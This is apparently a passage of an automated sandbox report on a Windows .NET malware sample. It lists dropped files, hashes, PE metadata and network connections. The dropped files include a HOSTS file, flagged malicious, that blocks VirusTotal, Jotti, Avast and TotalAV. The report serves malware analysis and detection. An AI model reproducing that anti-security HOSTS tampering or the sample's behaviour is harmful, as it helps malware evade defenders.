                                                                                                                            Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....].u...}.z.w..M..{/....?N.....}y..;Nlc....=....q......}/z..v.`....$....}...!.#....~..]g..}..1.QU.f.Zgk..|..V.v.k...i..&.9..U~.k......j..{.e.....9....~...7"}..x_.d$....5@..U.v.+.......-..G...T..)+6.'..A..^..}'..-....mA..C.~....WP?vY..^S;fiG..=t.?XR.7L.G.4,.......zJ...wE_F.;.........s..[.....gZ.....w@..q.!....+...T..................g.}../...~../.aP......k.....m.g.iI.g|.>.p....O=...1.~$..h.X>..!.V}.......~`.O._..........B.....O>......../.w....}..(.L..'..G..{C......q\?..c\k..|..1..xd.q.....~w'4....*6.....q.......J....=..3.N.q......s...........7..P.{A..5?..../.[.i,....=aB.....b..8.b...i.q......X_..m.q...0v.o...=........b.f.......}.K;n..~..nw...w....x?{...}n..v{.c..w.Vlk.....5/1f.x.]KK....g.......Z....[.....'..s........}.nM..|[....lB..s.y...iq.......v.5.....7B.>.j............5;..q}l5..c....?%^7..)O.g....s..c...m{C.o.s.M.)...q-.t=.16...
                                                                                                                            Process:C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):20480
                                                                                                                            Entropy (8bit):0.6732424250451717
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                            Malicious:false
                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):51200
                                                                                                                            Entropy (8bit):0.8745947603342119
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                            MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                            SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                            SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                            SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                            Malicious:false
                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):20480
                                                                                                                            Entropy (8bit):0.8508558324143882
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                            MD5:933D6D14518371B212F36C3835794D75
                                                                                                                            SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                            SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                            SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                            Malicious:false
                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2285
                                                                                                                            Entropy (8bit):4.576057831611122
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:vDZhyoZWM9rU5fFc7w09PI8A+VyUq8UwWsnNhUm:vDZEurK9z8TwU0wWsn/
                                                                                                                            MD5:A58B2342D8EAA7EA695FD216006E3DDD
                                                                                                                            SHA1:A286457D10D2A50E7B2699BDF55D85081FADD23C
                                                                                                                            SHA-256:C3AF2F576A3758B1BCDBD491B6021FBF52F6AFF4C0D03F4914D9C3F51A6A6361
                                                                                                                            SHA-512:B1938B288BECE554759F4FA8341513828487960991AE6C4A8C4D3958A5669357A6C2F1ED140FF87E740DC4C6AFEB9F16967AE7F4000F41341B802D22D8CE8FC3
                                                                                                                            Malicious:true
                                                                                                                            Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...0.0.0.0 virustotal.com..0.0.0.0 www.virustotal.com..0.0.0.0 virusscan.jotti.org..0.0.0.0 www.virusscan.jotti.org..0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com
                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Entropy (8bit):5.995125051419421
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                            File name:apDMcnqqWs.exe
                                                                                                                            File size:190'464 bytes
                                                                                                                            MD5:e09f55d421cb45340a8c97c217ba56cf
                                                                                                                            SHA1:2280afe7bb2d07c315e2599c21f069dd1b7ce3b8
                                                                                                                            SHA256:1e8d2f6fa4b8d1ec630758422c493de85d367f2eb7c76b452b9843ed2b2a7bff
                                                                                                                            SHA512:0d690f46d18855009af0b15a8e352dbe178de4d0f055fab00cc18837ad30aee3ffffef5263bb6598ff0e6ba7dbb55029ce976101be853cb03b01b9b440418c8b
                                                                                                                            SSDEEP:3072:L+AIo6iee4xc7I+g4A9PtLmMf8noNM3MWQ/s17LVHEEPX9p8lt1WkXBkrY1SZbBc:LGo6iee4xUZA9Pt6Mf8noNM3MWQ/s17P
                                                                                                                            TLSH:4014294853BC8F23F7AF4FFC866191D6CB72B107E84AF74E1C8890E825667816445BA7
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............^.... ........@.. .......................@............`................................
                                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                                            Entrypoint:0x42fd5e
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0xF5959D04 [Sun Jul 25 18:23:00 2100 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:4
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:4
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:4
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                            Instruction
                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x2fd0c0x4f.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x300000x550.rsrc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x320000xc.reloc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x2fcf00x1c.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                            .text0x20000x2dd640x2de00dfa34e24ec0ae8fa46925a31adefc1e9False0.38844835660762944data6.0132344968072955IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                            .rsrc0x300000x5500x600f35488c1e24e6c68f25bb08be804abb2False0.4134114583333333data4.5666280949668066IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .reloc0x320000xc0x20012806d217d24165bd64fb2dc9424a8d4False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                            RT_VERSION0x300a00x2c4data0.4463276836158192
                                                                                                                            RT_MANIFEST0x303640x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                            DLLImport
                                                                                                                            mscoree.dll_CorExeMain
                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 11, 2024 08:39:45.624835968 CET4972080192.168.2.6208.95.112.1
                                                                                                                            Dec 11, 2024 08:39:45.744735956 CET8049720208.95.112.1192.168.2.6
                                                                                                                            Dec 11, 2024 08:39:45.744915962 CET4972080192.168.2.6208.95.112.1
                                                                                                                            Dec 11, 2024 08:39:45.745012045 CET4972080192.168.2.6208.95.112.1
                                                                                                                            Dec 11, 2024 08:39:45.864567995 CET8049720208.95.112.1192.168.2.6
                                                                                                                            Dec 11, 2024 08:39:46.851389885 CET8049720208.95.112.1192.168.2.6
                                                                                                                            Dec 11, 2024 08:39:46.861989975 CET4972080192.168.2.6208.95.112.1
                                                                                                                            Dec 11, 2024 08:39:46.985948086 CET8049720208.95.112.1192.168.2.6
                                                                                                                            Dec 11, 2024 08:39:46.986044884 CET4972080192.168.2.6208.95.112.1
                                                                                                                            Dec 11, 2024 08:40:14.550421000 CET49787443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:14.550457001 CET44349787162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:14.550537109 CET49787443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:14.551110983 CET49787443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:14.551125050 CET44349787162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:15.764080048 CET44349787162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:15.764157057 CET49787443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:15.766582966 CET49787443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:15.766590118 CET44349787162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:15.766815901 CET44349787162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:15.776479006 CET49787443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:15.819340944 CET44349787162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:16.153038025 CET49787443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:16.153052092 CET44349787162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:16.191432953 CET44349787162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:16.403331995 CET44349787162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:16.403441906 CET49787443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:16.502782106 CET44349787162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:16.502882957 CET44349787162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:16.503575087 CET49787443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:16.507360935 CET49787443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:16.508574963 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:16.508618116 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:16.508977890 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:16.509248018 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:16.509255886 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:17.718254089 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:17.726809025 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:17.726816893 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.087228060 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.087243080 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.087438107 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.087443113 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.087573051 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.087587118 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.087881088 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.087908030 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088021994 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088049889 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088166952 CET49793443192.168.2.6162.159.138.232
